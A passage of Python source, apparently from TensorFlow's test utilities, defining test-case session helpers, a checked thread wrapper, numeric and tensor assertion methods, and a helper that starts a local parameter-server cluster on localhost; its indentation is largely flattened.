of the test (in the TearDown function).
Use the `use_gpu` and `force_gpu` options to control where ops are run. If
`force_gpu` is True, all ops are pinned to `/device:GPU:0`. Otherwise, if
`use_gpu` is True, TensorFlow tries to run as many ops on the GPU as
    possible. If both `force_gpu` and `use_gpu` are False, all ops are pinned to
the CPU.
Example:
```python
class MyOperatorTest(test_util.TensorFlowTestCase):
def testMyOperator(self):
with self.cached_session(use_gpu=True) as sess:
valid_input = [1.0, 2.0, 3.0, 4.0, 5.0]
result = MyOperator(valid_input).eval()
          self.assertEqual(result, [1.0, 2.0, 3.0, 5.0, 8.0])
invalid_input = [-1.0, 2.0, 7.0]
with self.assertRaisesOpError("negative input not supported"):
MyOperator(invalid_input).eval()
```
Args:
graph: Optional graph to use during the returned session.
config: An optional config_pb2.ConfigProto to use to configure the
session.
use_gpu: If True, attempt to run as many ops as possible on GPU.
force_gpu: If True, pin all ops to `/device:GPU:0`.
Yields:
A Session object that should be used as a context manager to surround
the graph building and execution code in a test case.
"""
if context.executing_eagerly():
yield FakeEagerSession(self)
else:
sess = self._get_cached_session(
graph, config, force_gpu, crash_if_inconsistent_args=True)
with self._constrain_devices_and_set_default(sess, use_gpu,
force_gpu) as cached:
yield cached
@contextlib.contextmanager
@deprecation.deprecated(None, "Use `self.session()` or "
"`self.cached_session()` instead.")
def test_session(self,
graph=None,
config=None,
use_gpu=False,
force_gpu=False):
"""Use cached_session instead."""
if self.id().endswith(".test_session"):
self.skipTest(
"Tests that have the name \"test_session\" are automatically skipped "
"by TensorFlow test fixture, as the name is reserved for creating "
"sessions within tests. Please rename your test if you have a test "
"with this name.")
if context.executing_eagerly():
yield None
else:
if graph is None:
sess = self._get_cached_session(
graph, config, force_gpu, crash_if_inconsistent_args=False)
with self._constrain_devices_and_set_default(sess, use_gpu,
force_gpu) as cached:
yield cached
else:
with self.session(graph, config, use_gpu, force_gpu) as sess:
yield sess
# pylint: enable=g-doc-return-or-yield
class _CheckedThread(object):
"""A wrapper class for Thread that asserts successful completion.
This class should be created using the TensorFlowTestCase.checkedThread()
method.
"""
def __init__(self, testcase, target, args=None, kwargs=None):
"""Constructs a new instance of _CheckedThread.
Args:
testcase: The TensorFlowTestCase for which this thread is being created.
target: A callable object representing the code to be executed in the
thread.
args: A tuple of positional arguments that will be passed to target.
kwargs: A dictionary of keyword arguments that will be passed to target.
"""
self._testcase = testcase
self._target = target
self._args = () if args is None else args
self._kwargs = {} if kwargs is None else kwargs
self._thread = threading.Thread(target=self._protected_run)
self._exception = None
self._is_thread_joined = False
def _protected_run(self):
"""Target for the wrapper thread. Sets self._exception on failure."""
try:
self._target(*self._args, **self._kwargs)
except Exception as e: # pylint: disable=broad-except
self._exception = e
def start(self):
"""Starts the thread's activity.
This must be called at most once per _CheckedThread object. It arranges
for the object's target to be invoked in a separate thread of control.
"""
self._thread.start()
def join(self):
"""Blocks until the thread terminates.
Raises:
        self._testcase.failureException: If the thread terminates due to
an exception.
"""
self._is_thread_joined = True
self._thread.join()
if self._exception is not None:
self._testcase.fail("Error in checkedThread: %s" % str(self._exception))
def is_alive(self):
"""Returns whether the thread is alive.
This method returns True just before the run() method starts
until just after the run() method terminates.
Returns:
True if the thread is alive, otherwise False.
"""
return self._thread.is_alive()
def check_termination(self):
"""Returns whether the checked thread was properly used and did terminate.
Every checked thread should be "join"ed after starting, and before the
test tears down. If it is not joined, it is possible the thread will hang
and cause flaky failures in tests.
Raises:
self._testcase.failureException: If check_termination was called before
thread was joined.
RuntimeError: If the thread is not terminated. This means thread was not
joined with the main thread.
"""
if self._is_thread_joined:
if self.is_alive():
raise RuntimeError(
"Thread was not joined with main thread, and is still running "
"when the test finished.")
else:
self._testcase.fail("A checked thread was not joined.")
def checkedThread(self, target, args=None, kwargs=None):
"""Returns a Thread wrapper that asserts 'target' completes successfully.
This method should be used to create all threads in test cases, as
otherwise there is a risk that a thread will silently fail, and/or
assertions made in the thread will not be respected.
Args:
target: A callable object to be executed in the thread.
args: The argument tuple for the target invocation. Defaults to ().
kwargs: A dictionary of keyword arguments for the target invocation.
Defaults to {}.
Returns:
A wrapper for threading.Thread that supports start() and join() methods.
"""
ret = TensorFlowTestCase._CheckedThread(self, target, args, kwargs)
self._threads.append(ret)
return ret
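  # A minimal usage sketch (the worker function and argument are illustrative
  # assumptions): every thread created in a test should go through
  # checkedThread so that exceptions raised inside it fail the test instead
  # of vanishing silently.
  #
  #   t = self.checkedThread(target=my_worker, args=(work_queue,))
  #   t.start()
  #   ...
  #   t.join()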
# pylint: enable=invalid-name
@py_func_if_in_function
def assertNear(self, f1, f2, err, msg=None):
"""Asserts that two floats are near each other.
Checks that |f1 - f2| < err and asserts a test failure
if not.
Args:
f1: A float value.
f2: A float value.
err: A float value.
msg: An optional string message to append to the failure message.
"""
# f1 == f2 is needed here as we might have: f1, f2 = inf, inf
self.assertTrue(
f1 == f2 or math.fabs(f1 - f2) <= err, "%f != %f +/- %f%s" %
(f1, f2, err, " (%s)" % msg if msg is not None else ""))
@py_func_if_in_function
def assertArrayNear(self, farray1, farray2, err, msg=None):
"""Asserts that two float arrays are near each other.
Checks that for all elements of farray1 and farray2
|f1 - f2| < err. Asserts a test failure if not.
Args:
farray1: a list of float values.
farray2: a list of float values.
err: a float value.
msg: Optional message to report on failure.
"""
self.assertEqual(len(farray1), len(farray2), msg=msg)
for f1, f2 in zip(farray1, farray2):
self.assertNear(float(f1), float(f2), err, msg=msg)
def _NDArrayNear(self, ndarray1, ndarray2, err):
return np.linalg.norm(ndarray1 - ndarray2) < err
@py_func_if_in_function
def assertNDArrayNear(self, ndarray1, ndarray2, err, msg=None):
"""Asserts that two numpy arrays have near values.
Args:
ndarray1: a numpy ndarray.
ndarray2: a numpy ndarray.
err: a float. The maximum absolute difference allowed.
msg: Optional message to report on failure.
"""
self.assertTrue(self._NDArrayNear(ndarray1, ndarray2, err), msg=msg)
def _GetNdArray(self, a):
# If a is tensor-like then convert it to ndarray
if tensor_util.is_tensor(a):
if isinstance(a, ops._EagerTensorBase):
a = a.numpy()
else:
a = self.evaluate(a)
if not isinstance(a, np.ndarray):
return np.array(a)
return a
def _assertArrayLikeAllClose(self, a, b, rtol=1e-6, atol=1e-6, msg=None):
a = self._GetNdArray(a)
b = self._GetNdArray(b)
# When the array rank is small, print its contents. Numpy array printing is
# implemented using inefficient recursion so prints can cause tests to
# time out.
if a.shape != b.shape and (b.ndim <= 3 or b.size < 500):
shape_mismatch_msg = ("Shape mismatch: expected %s, got %s with contents "
"%s.") % (a.shape, b.shape, b)
else:
shape_mismatch_msg = "Shape mismatch: expected %s, got %s." % (a.shape,
b.shape)
self.assertEqual(a.shape, b.shape, shape_mismatch_msg)
msgs = [msg]
# np.allclose does not always work for our custom bfloat16 extension type
# when type promotions are involved, so we first cast any bfloat16 arrays
# to float32.
a_dtype = a.dtype
a = a.astype(np.float32) if a.dtype == dtypes.bfloat16.as_numpy_dtype else a
b = b.astype(np.float32) if b.dtype == dtypes.bfloat16.as_numpy_dtype else b
if not np.allclose(a, b, rtol=rtol, atol=atol):
# Adds more details to np.testing.assert_allclose.
#
# NOTE: numpy.allclose (and numpy.testing.assert_allclose)
# checks whether two arrays are element-wise equal within a
# tolerance. The relative difference (rtol * abs(b)) and the
# absolute difference atol are added together to compare against
      # the absolute difference between a and b. Here, we want to
      # tell the user which elements violate such conditions.
cond = np.logical_or(
np.abs(a - b) > atol + rtol * np.abs(b),
np.isnan(a) != np.isnan(b))
if a.ndim:
x = a[np.where(cond)]
y = b[np.where(cond)]
msgs.append("not close where = {}".format(np.where(cond)))
else:
# np.where is broken for scalars
x, y = a, b
msgs.append("not close lhs = {}".format(x))
msgs.append("not close rhs = {}".format(y))
msgs.append("not close dif = {}".format(np.abs(x - y)))
msgs.append("not close tol = {}".format(atol + rtol * np.abs(y)))
msgs.append("dtype = {}, shape = {}".format(a_dtype, a.shape))
# TODO(xpan): There seems to be a bug:
# tensorflow/compiler/tests:binary_ops_test pass with float32
# nan even though the equal_nan is False by default internally.
np.testing.assert_allclose(
a, b, rtol=rtol, atol=atol, err_msg="\n".join(msgs), equal_nan=True)
def _assertAllCloseRecursive(self,
a,
b,
rtol=1e-6,
atol=1e-6,
path=None,
msg=None):
path = path or []
path_str = (("[" + "][".join(str(p) for p in path) + "]") if path else "")
msg = msg if msg else ""
# Check if a and/or b are namedtuples.
if hasattr(a, "_asdict"):
a = a._asdict()
if hasattr(b, "_asdict"):
b = b._asdict()
a_is_dict = isinstance(a, collections_abc.Mapping)
if a_is_dict != isinstance(b, collections_abc.Mapping):
raise ValueError("Can't compare dict to non-dict, a%s vs b%s. %s" %
(path_str, path_str, msg))
if a_is_dict:
self.assertItemsEqual(
a.keys(),
b.keys(),
msg="mismatched keys: a%s has keys %s, but b%s has keys %s. %s" %
(path_str, a.keys(), path_str, b.keys(), msg))
for k in a:
path.append(k)
self._assertAllCloseRecursive(
a[k], b[k], rtol=rtol, atol=atol, path=path, msg=msg)
del path[-1]
elif isinstance(a, (list, tuple)):
      # Try to directly compare a, b as ndarrays; if that doesn't work, then
      # traverse through the sequence, which is more expensive.
try:
a_as_ndarray = self._GetNdArray(a)
b_as_ndarray = self._GetNdArray(b)
self._assertArrayLikeAllClose(
a_as_ndarray,
b_as_ndarray,
rtol=rtol,
atol=atol,
msg="Mismatched value: a%s is different from b%s. %s" %
(path_str, path_str, msg))
except (ValueError, TypeError) as e:
if len(a) != len(b):
raise ValueError(
"Mismatched length: a%s has %d items, but b%s has %d items. %s" %
(path_str, len(a), path_str, len(b), msg))
for idx, (a_ele, b_ele) in enumerate(zip(a, b)):
path.append(str(idx))
self._assertAllCloseRecursive(
a_ele, b_ele, rtol=rtol, atol=atol, path=path, msg=msg)
del path[-1]
# a and b are ndarray like objects
else:
try:
self._assertArrayLikeAllClose(
a,
b,
rtol=rtol,
atol=atol,
msg=("Mismatched value: a%s is different from b%s. %s" %
(path_str, path_str, msg)))
except TypeError as e:
msg = ("Error: a%s has %s, but b%s has %s. %s" %
(path_str, type(a), path_str, type(b), msg))
e.args = ((e.args[0] + " : " + msg,) + e.args[1:])
raise
@py_func_if_in_function
def assertAllClose(self, a, b, rtol=1e-6, atol=1e-6, msg=None):
"""Asserts that two structures of numpy arrays or Tensors, have near values.
`a` and `b` can be arbitrarily nested structures. A layer of a nested
structure can be a `dict`, `namedtuple`, `tuple` or `list`.
Note: the implementation follows
[`numpy.allclose`](https://docs.scipy.org/doc/numpy/reference/generated/numpy.allclose.html)
(and numpy.testing.assert_allclose). It checks whether two arrays are
element-wise equal within a tolerance. The relative difference
(`rtol * abs(b)`) and the absolute difference `atol` are added together
to compare against the absolute difference between `a` and `b`.
Args:
      a: The expected numpy `ndarray`, or anything that can be converted into a
        numpy `ndarray` (including Tensor), or any arbitrarily nested structure
        of these.
      b: The actual numpy `ndarray`, or anything that can be converted into a
        numpy `ndarray` (including Tensor), or any arbitrarily nested structure
        of these.
rtol: relative tolerance.
atol: absolute tolerance.
msg: Optional message to report on failure.
Raises:
ValueError: if only one of `a[p]` and `b[p]` is a dict or
`a[p]` and `b[p]` have different length, where `[p]` denotes a path
to the nested structure, e.g. given `a = [(1, 1), {'d': (6, 7)}]` and
`[p] = [1]['d']`, then `a[p] = (6, 7)`.
"""
if ragged_tensor.is_ragged(a) or ragged_tensor.is_ragged(b):
return self._assertRaggedClose(a, b, rtol, atol, msg)
self._assertAllCloseRecursive(a, b, rtol=rtol, atol=atol, msg=msg)
@py_func_if_in_function
def assertAllCloseAccordingToType(self,
a,
b,
rtol=1e-6,
atol=1e-6,
float_rtol=1e-6,
float_atol=1e-6,
half_rtol=1e-3,
half_atol=1e-3,
bfloat16_rtol=1e-2,
bfloat16_atol=1e-2,
msg=None):
"""Like assertAllClose, but also suitable for comparing fp16 arrays.
In particular, the tolerance is reduced to 1e-3 if at least
one of the arguments is of type float16.
Args:
      a: the expected numpy ndarray, or anything that can be converted to one.
      b: the actual numpy ndarray, or anything that can be converted to one.
rtol: relative tolerance.
atol: absolute tolerance.
float_rtol: relative tolerance for float32.
float_atol: absolute tolerance for float32.
half_rtol: relative tolerance for float16.
half_atol: absolute tolerance for float16.
bfloat16_rtol: relative tolerance for bfloat16.
bfloat16_atol: absolute tolerance for bfloat16.
msg: Optional message to report on failure.
"""
a = self._GetNdArray(a)
b = self._GetNdArray(b)
# types with lower tol are put later to overwrite previous ones.
if (a.dtype == np.float32 or b.dtype == np.float32 or
a.dtype == np.complex64 or b.dtype == np.complex64):
rtol = max(rtol, float_rtol)
atol = max(atol, float_atol)
if a.dtype == np.float16 or b.dtype == np.float16:
rtol = max(rtol, half_rtol)
atol = max(atol, half_atol)
if (a.dtype == dtypes.bfloat16.as_numpy_dtype or
b.dtype == dtypes.bfloat16.as_numpy_dtype):
rtol = max(rtol, bfloat16_rtol)
atol = max(atol, bfloat16_atol)
self.assertAllClose(a, b, rtol=rtol, atol=atol, msg=msg)
@py_func_if_in_function
def assertNotAllClose(self, a, b, rtol=1e-6, atol=1e-6, msg=None):
"""Assert that two numpy arrays, or Tensors, do not have near values.
Args:
      a: The expected numpy `ndarray`, or anything that can be converted into a
        numpy `ndarray` (including Tensor), or any arbitrarily nested structure
        of these.
      b: The actual numpy `ndarray`, or anything that can be converted into a
        numpy `ndarray` (including Tensor), or any arbitrarily nested structure
        of these.
rtol: relative tolerance.
atol: absolute tolerance.
msg: Optional message to report on failure.
Raises:
AssertionError: If `a` and `b` are unexpectedly close at all elements.
"""
try:
self.assertAllClose(a, b, rtol=rtol, atol=atol, msg=msg)
except AssertionError:
return
msg = msg or ""
raise AssertionError("The two values are close at all elements. %s" % msg)
@py_func_if_in_function
def assertAllEqual(self, a, b, msg=None):
"""Asserts that two numpy arrays or Tensors have the same values.
Args:
      a: the expected numpy ndarray, or anything that can be converted to one.
      b: the actual numpy ndarray, or anything that can be converted to one.
msg: Optional message to report on failure.
"""
if (ragged_tensor.is_ragged(a) or ragged_tensor.is_ragged(b)):
return self._assertRaggedEqual(a, b, msg)
msg = msg if msg else ""
a = self._GetNdArray(a)
b = self._GetNdArray(b)
# Arbitrary bounds so that we don't print giant tensors.
if (b.ndim <= 3 or b.size < 500):
self.assertEqual(
a.shape, b.shape, "Shape mismatch: expected %s, got %s."
" Contents: %r. \n%s." % (a.shape, b.shape, b, msg))
else:
self.assertEqual(
a.shape, b.shape, "Shape mismatch: expected %s, got %s."
" %s" % (a.shape, b.shape, msg))
same = (a == b)
if (a.dtype in [
np.float16, np.float32, np.float64, dtypes.bfloat16.as_numpy_dtype
]):
same = np.logical_or(same, np.logical_and(np.isnan(a), np.isnan(b)))
msgs = [msg]
if not np.all(same):
# Adds more details to np.testing.assert_array_equal.
diff = np.logical_not(same)
if a.ndim:
x = a[np.where(diff)]
y = b[np.where(diff)]
msgs.append("not equal where = {}".format(np.where(diff)))
else:
# np.where is broken for scalars
x, y = a, b
msgs.append("not equal lhs = %r" % x)
msgs.append("not equal rhs = %r" % y)
# Handle mixed string types as a result of PY2to3 migration. That is, the
# mixing between bytes (b-prefix strings, PY2 default) and unicodes
# (u-prefix strings, PY3 default).
if six.PY3:
if (a.dtype.kind != b.dtype.kind and
{a.dtype.kind, b.dtype.kind}.issubset({"U", "S", "O"})):
a_list = []
b_list = []
# OK to flatten `a` and `b` because they are guaranteed to have the
# same shape.
for out_list, flat_arr in [(a_list, a.flat), (b_list, b.flat)]:
for item in flat_arr:
if isinstance(item, str):
out_list.append(item.encode("utf-8"))
else:
out_list.append(item)
a = np.array(a_list)
b = np.array(b_list)
np.testing.assert_array_equal(a, b, err_msg="\n".join(msgs))
@py_func_if_in_function
def assertNotAllEqual(self, a, b, msg=None):
"""Asserts that two numpy arrays or Tensors do not have the same values.
Args:
      a: the expected numpy ndarray, or anything that can be converted to one.
      b: the actual numpy ndarray, or anything that can be converted to one.
msg: Optional message to report on failure.
"""
try:
self.assertAllEqual(a, b)
except AssertionError:
return
raise AssertionError("The two values are equal at all elements. %s" % msg)
@py_func_if_in_function
def assertAllGreater(self, a, comparison_target):
"""Assert element values are all greater than a target value.
Args:
a: The numpy `ndarray`, or anything that can be converted into a numpy
`ndarray` (including Tensor).
comparison_target: The target value of comparison.
"""
a = self._GetNdArray(a)
self.assertGreater(np.min(a), comparison_target)
@py_func_if_in_function
def assertAllLess(self, a, comparison_target):
"""Assert element values are all less than a target value.
Args:
a: The numpy `ndarray`, or anything that can be converted into a numpy
`ndarray` (including Tensor).
comparison_target: The target value of comparison.
"""
a = self._GetNdArray(a)
self.assertLess(np.max(a), comparison_target)
@py_func_if_in_function
def assertAllGreaterEqual(self, a, comparison_target):
"""Assert element values are all greater than or equal to a target value.
Args:
a: The numpy `ndarray`, or anything that can be converted into a numpy
`ndarray` (including Tensor).
comparison_target: The target value of comparison.
"""
a = self._GetNdArray(a)
self.assertGreaterEqual(np.min(a), comparison_target)
@py_func_if_in_function
def assertAllLessEqual(self, a, comparison_target):
"""Assert element values are all less than or equal to a target value.
Args:
a: The numpy `ndarray`, or anything that can be converted into a numpy
`ndarray` (including Tensor).
comparison_target: The target value of comparison.
"""
a = self._GetNdArray(a)
self.assertLessEqual(np.max(a), comparison_target)
def _format_subscripts(self, subscripts, value, limit=10, indent=2):
"""Generate a summary of ndarray subscripts as a list of str.
    If limit == N, this method will print up to the first N subscripts on
    separate lines. A line of ellipses (...) will be appended at the end if the
    number of subscripts exceeds N.
Args:
subscripts: The tensor (np.ndarray) subscripts, of the same format as
np.where()'s return value, i.e., a tuple of arrays with each array
corresponding to a dimension. E.g., (array([1, 1]), array([0, 1])).
value: (np.ndarray) value of the tensor.
limit: (int) The maximum number of indices to print.
indent: (int) Number of characters to indent at the beginning of each
line.
Returns:
(list of str) the multi-line representation of the subscripts and values,
potentially with omission at the end.
"""
lines = []
subscripts = np.transpose(subscripts)
prefix = " " * indent
if np.ndim(value) == 0:
return [prefix + "[0] : " + str(value)]
for subscript in itertools.islice(subscripts, limit):
lines.append(prefix + str(subscript) + " : " +
str(value[tuple(subscript)]))
if len(subscripts) > limit:
lines.append(prefix + "...")
return lines
@py_func_if_in_function
def assertAllInRange(self,
target,
lower_bound,
upper_bound,
open_lower_bound=False,
open_upper_bound=False):
"""Assert that elements in a Tensor are all in a given range.
Args:
target: The numpy `ndarray`, or anything that can be converted into a
numpy `ndarray` (including Tensor).
lower_bound: lower bound of the range
upper_bound: upper bound of the range
open_lower_bound: (`bool`) whether the lower bound is open (i.e., > rather
than the default >=)
open_upper_bound: (`bool`) whether the upper bound is open (i.e., < rather
than the default <=)
Raises:
AssertionError:
if the value tensor does not have an ordered numeric type (float* or
int*), or
if there are nan values, or
if any of the elements do not fall in the specified range.
"""
target = self._GetNdArray(target)
if not (np.issubdtype(target.dtype, np.floating) or
np.issubdtype(target.dtype, np.integer)):
raise AssertionError(
"The value of %s does not have an ordered numeric type, instead it "
"has type: %s" % (target, target.dtype))
nan_subscripts = np.where(np.isnan(target))
if np.size(nan_subscripts):
raise AssertionError(
"%d of the %d element(s) are NaN. "
"Subscripts(s) and value(s) of the NaN element(s):\n" %
(len(nan_subscripts[0]), np.size(target)) +
"\n".join(self._format_subscripts(nan_subscripts, target)))
range_str = (("(" if open_lower_bound else "[") + str(lower_bound) + ", " +
str(upper_bound) + (")" if open_upper_bound else "]"))
violations = (
np.less_equal(target, lower_bound) if open_lower_bound else np.less(
target, lower_bound))
violations = np.logical_or(
violations,
np.greater_equal(target, upper_bound)
if open_upper_bound else np.greater(target, upper_bound))
violation_subscripts = np.where(violations)
if np.size(violation_subscripts):
raise AssertionError(
"%d of the %d element(s) are outside the range %s. " %
(len(violation_subscripts[0]), np.size(target), range_str) +
"Subscript(s) and value(s) of the offending elements:\n" +
"\n".join(self._format_subscripts(violation_subscripts, target)))
@py_func_if_in_function
def assertAllInSet(self, target, expected_set):
"""Assert that elements of a Tensor are all in a given closed set.
Args:
target: The numpy `ndarray`, or anything that can be converted into a
numpy `ndarray` (including Tensor).
expected_set: (`list`, `tuple` or `set`) The closed set that the elements
of the value of `target` are expected to fall into.
Raises:
AssertionError:
if any of the elements do not fall into `expected_set`.
"""
target = self._GetNdArray(target)
# Elements in target that are not in expected_set.
diff = np.setdiff1d(target.flatten(), list(expected_set))
if np.size(diff):
raise AssertionError("%d unique element(s) are not in the set %s: %s" %
(np.size(diff), expected_set, diff))
@py_func_if_in_function
def assertDTypeEqual(self, target, expected_dtype):
"""Assert ndarray data type is equal to expected.
Args:
target: The numpy `ndarray`, or anything that can be converted into a
numpy `ndarray` (including Tensor).
expected_dtype: Expected data type.
"""
target = self._GetNdArray(target)
if not isinstance(target, list):
arrays = [target]
for arr in arrays:
self.assertEqual(arr.dtype, expected_dtype)
# pylint: disable=g-doc-return-or-yield
@contextlib.contextmanager
def assertRaisesWithPredicateMatch(self, exception_type,
expected_err_re_or_predicate):
"""Returns a context manager to enclose code expected to raise an exception.
If the exception is an OpError, the op stack is also included in the message
predicate search.
Args:
exception_type: The expected type of exception that should be raised.
expected_err_re_or_predicate: If this is callable, it should be a function
of one argument that inspects the passed-in exception and returns True
(success) or False (please fail the test). Otherwise, the error message
is expected to match this regular expression partially.
Returns:
A context manager to surround code that is expected to raise an
exception.
"""
if callable(expected_err_re_or_predicate):
predicate = expected_err_re_or_predicate
else:
def predicate(e):
err_str = e.message if isinstance(e, errors.OpError) else str(e)
op = e.op if isinstance(e, errors.OpError) else None
while op is not None:
err_str += "\nCaused by: " + op.name
op = op._original_op # pylint: disable=protected-access
logging.info("Searching within error strings: '%s' within '%s'",
expected_err_re_or_predicate, err_str)
return re.search(expected_err_re_or_predicate, err_str)
try:
yield
self.fail(exception_type.__name__ + " not raised")
except Exception as e: # pylint: disable=broad-except
if not isinstance(e, exception_type) or not predicate(e):
raise AssertionError("Exception of type %s: %s" %
(str(type(e)), str(e)))
# pylint: enable=g-doc-return-or-yield
def assertRaisesOpError(self, expected_err_re_or_predicate):
return self.assertRaisesWithPredicateMatch(errors.OpError,
expected_err_re_or_predicate)
def assertShapeEqual(self, np_array, tf_tensor, msg=None):
"""Asserts that a Numpy ndarray and a TensorFlow tensor have the same shape.
Args:
np_array: A Numpy ndarray or Numpy scalar.
tf_tensor: A Tensor.
msg: Optional message to report on failure.
Raises:
TypeError: If the arguments have the wrong type.
"""
if not isinstance(np_array, (np.ndarray, np.generic)):
raise TypeError("np_array must be a Numpy ndarray or Numpy scalar")
if not isinstance(tf_tensor, ops.Tensor):
raise TypeError("tf_tensor must be a Tensor")
self.assertAllEqual(
np_array.shape, tf_tensor.get_shape().as_list(), msg=msg)
def assertDeviceEqual(self, device1, device2, msg=None):
"""Asserts that the two given devices are the same.
Args:
device1: A string device name or TensorFlow `DeviceSpec` object.
device2: A string device name or TensorFlow `DeviceSpec` object.
msg: Optional message to report on failure.
"""
device1 = pydev.canonical_name(device1)
device2 = pydev.canonical_name(device2)
self.assertEqual(
device1, device2,
"Devices %s and %s are not equal. %s" % (device1, device2, msg))
def _GetPyList(self, a):
"""Converts `a` to a nested python list."""
if isinstance(a, ragged_tensor.RaggedTensor):
return self.evaluate(a).to_list()
elif isinstance(a, ops.Tensor):
a = self.evaluate(a)
return a.tolist() if isinstance(a, np.ndarray) else a
elif isinstance(a, np.ndarray):
return a.tolist()
elif isinstance(a, ragged_tensor_value.RaggedTensorValue):
return a.to_list()
else:
return np.array(a).tolist()
def _assertRaggedEqual(self, a, b, msg):
"""Asserts that two ragged tensors are equal."""
a_list = self._GetPyList(a)
b_list = self._GetPyList(b)
self.assertEqual(a_list, b_list, msg)
if not (isinstance(a, (list, tuple)) or isinstance(b, (list, tuple))):
a_ragged_rank = a.ragged_rank if ragged_tensor.is_ragged(a) else 0
b_ragged_rank = b.ragged_rank if ragged_tensor.is_ragged(b) else 0
self.assertEqual(a_ragged_rank, b_ragged_rank, msg)
def _assertRaggedClose(self, a, b, rtol, atol, msg=None):
a_list = self._GetPyList(a)
b_list = self._GetPyList(b)
self._assertListCloseRecursive(a_list, b_list, rtol, atol, msg)
if not (isinstance(a, (list, tuple)) or isinstance(b, (list, tuple))):
a_ragged_rank = a.ragged_rank if ragged_tensor.is_ragged(a) else 0
b_ragged_rank = b.ragged_rank if ragged_tensor.is_ragged(b) else 0
self.assertEqual(a_ragged_rank, b_ragged_rank, msg)
def _assertListCloseRecursive(self, a, b, rtol, atol, msg, path="value"):
self.assertEqual(type(a), type(b))
if isinstance(a, (list, tuple)):
self.assertLen(a, len(b), "Length differs for %s" % path)
for i in range(len(a)):
self._assertListCloseRecursive(a[i], b[i], rtol, atol, msg,
"%s[%s]" % (path, i))
else:
self._assertAllCloseRecursive(a, b, rtol, atol, path, msg)
# Fix Python 3+ compatibility issues
if not six.PY2:
# pylint: disable=invalid-name
# Silence a deprecation warning
assertRaisesRegexp = googletest.TestCase.assertRaisesRegex
# assertItemsEqual is assertCountEqual as of 3.2.
assertItemsEqual = googletest.TestCase.assertCountEqual
# pylint: enable=invalid-name
@contextlib.contextmanager
def _constrain_devices_and_set_default(self, sess, use_gpu, force_gpu):
"""Set the session and its graph to global default and constrain devices."""
if context.executing_eagerly():
yield None
else:
with sess.graph.as_default(), sess.as_default():
if force_gpu:
# Use the name of an actual device if one is detected, or
# '/device:GPU:0' otherwise
gpu_name = gpu_device_name()
if not gpu_name:
gpu_name = "/device:GPU:0"
with sess.graph.device(gpu_name):
yield sess
elif use_gpu:
yield sess
else:
with sess.graph.device("/device:CPU:0"):
yield sess
def _create_session(self, graph, config, force_gpu):
"""See session() for details."""
def prepare_config(config):
"""Returns a config for sessions.
Args:
config: An optional config_pb2.ConfigProto to use to configure the
session.
Returns:
A config_pb2.ConfigProto object.
"""
# TODO(b/114333779): Enforce allow_soft_placement=False when
# use_gpu=False. Currently many tests rely on the fact that any device
# will be used even when a specific device is supposed to be used.
allow_soft_placement = not force_gpu
if config is None:
config = context.context().config
config.allow_soft_placement = allow_soft_placement
elif not allow_soft_placement and config.allow_soft_placement:
config_copy = context.context().config
config = config_copy
config.allow_soft_placement = False
# Don't perform optimizations for tests so we don't inadvertently run
# gpu ops on cpu
config.graph_options.optimizer_options.opt_level = -1
# Disable Grappler constant folding since some tests & benchmarks
# use constant input and become meaningless after constant folding.
# DO NOT DISABLE GRAPPLER OPTIMIZERS WITHOUT CONSULTING WITH THE
# GRAPPLER TEAM.
config.graph_options.rewrite_options.constant_folding = (
rewriter_config_pb2.RewriterConfig.OFF)
config.graph_options.rewrite_options.pin_to_host_optimization = (
rewriter_config_pb2.RewriterConfig.OFF)
return config
return ErrorLoggingSession(graph=graph, config=prepare_config(config))
def _get_cached_session(self,
graph=None,
config=None,
force_gpu=False,
crash_if_inconsistent_args=True):
"""See cached_session() for documentation."""
if self._cached_session is None:
sess = self._create_session(
graph=graph, config=config, force_gpu=force_gpu)
self._cached_session = sess
self._cached_graph = graph
self._cached_config = config
self._cached_force_gpu = force_gpu
return sess
else:
if crash_if_inconsistent_args and self._cached_graph is not graph:
raise ValueError("The graph used to get the cached session is "
"different than the one that was used to create the "
"session. Maybe create a new session with "
"self.session()")
if crash_if_inconsistent_args and self._cached_config is not config:
raise ValueError("The config used to get the cached session is "
"different than the one that was used to create the "
"session. Maybe create a new session with "
"self.session()")
if crash_if_inconsistent_args and (self._cached_force_gpu is
not force_gpu):
raise ValueError(
"The force_gpu value used to get the cached session is "
"different than the one that was used to create the "
"session. Maybe create a new session with "
"self.session()")
return self._cached_session
@tf_export("test.create_local_cluster")
def create_local_cluster(num_workers,
num_ps,
protocol="grpc",
worker_config=None,
ps_config=None):
"""Create and start local servers and return the associated `Server` objects.
"PS" stands for "parameter server": a task responsible for storing and
updating the model's parameters. Other tasks send updates to these parameters
as they work on optimizing the parameters. This particular division of labor
between tasks is not required, but is common for distributed training.
Read more at https://www.tensorflow.org/guide/extend/architecture

Figure illustrates the interaction of these components.
"/job:worker/task:0" and "/job:ps/task:0" are both tasks with worker services.
Example:
```python
workers, _ = tf.test.create_local_cluster(num_workers=2, num_ps=2)
worker_sessions = [tf.compat.v1.Session(w.target) for w in workers]
with tf.device("/job:ps/task:0"):
...
with tf.device("/job:ps/task:1"):
...
with tf.device("/job:worker/task:0"):
...
with tf.device("/job:worker/task:1"):
...
worker_sessions[0].run(...)
```
Args:
num_workers: Number of worker servers to start.
num_ps: Number of PS servers to start.
protocol: Communication protocol. Allowed values are documented in the
documentation of `tf.distribute.Server`.
worker_config: (optional) `tf.ConfigProto` to initialize workers. Can be
used to instantiate multiple devices etc.
ps_config: (optional) `tf.ConfigProto` to initialize PS servers.
Returns:
A tuple `(worker_servers, ps_servers)`. `worker_servers` is a list
of `num_workers` objects of type `tf.distribute.Server` (all running
locally);
and `ps_servers` is a list of `num_ps` objects of similar type.
Raises:
ImportError: if portpicker module was not found at load time
"""
import portpicker # pylint: disable=g-import-not-at-top
worker_ports = [portpicker.pick_unused_port() for _ in range(num_workers)]
ps_ports = [portpicker.pick_unused_port() for _ in range(num_ps)]
cluster_dict = {
"worker": ["localhost:%s" % port for port in worker_ports],
"ps": ["localhost:%s" % port for port in ps_ports]
}
cs = server_lib.ClusterSpec(cluster_dict)
workers = [
server_lib.Server(
cs,
job_name="worker",
protocol=protocol,
task_index=ix,
config=worker_config,
start=True) for ix in range(num_workers)
]
ps_servers = [
server_lib.Server(
cs,
job_name="ps",
protocol=protocol,
task_index=ix,
config=ps_config,
start=True) for ix in range(num_ps)
]
return workers, ps_servers
def get_node_def_from_graph(node_name, graph_def):
"""Returns the `NodeDef` instance for given node name in the graph def.
This method explores only the NodeDefs in `graph_def.node`.
Args:
node_name: Name of the NodeDef to search for.
graph_def: An instance of `GraphDef` proto.
Returns:
the `NodeDef` instance whose name field matches the given node_name or None.
"""
for node_def in graph_def.node:
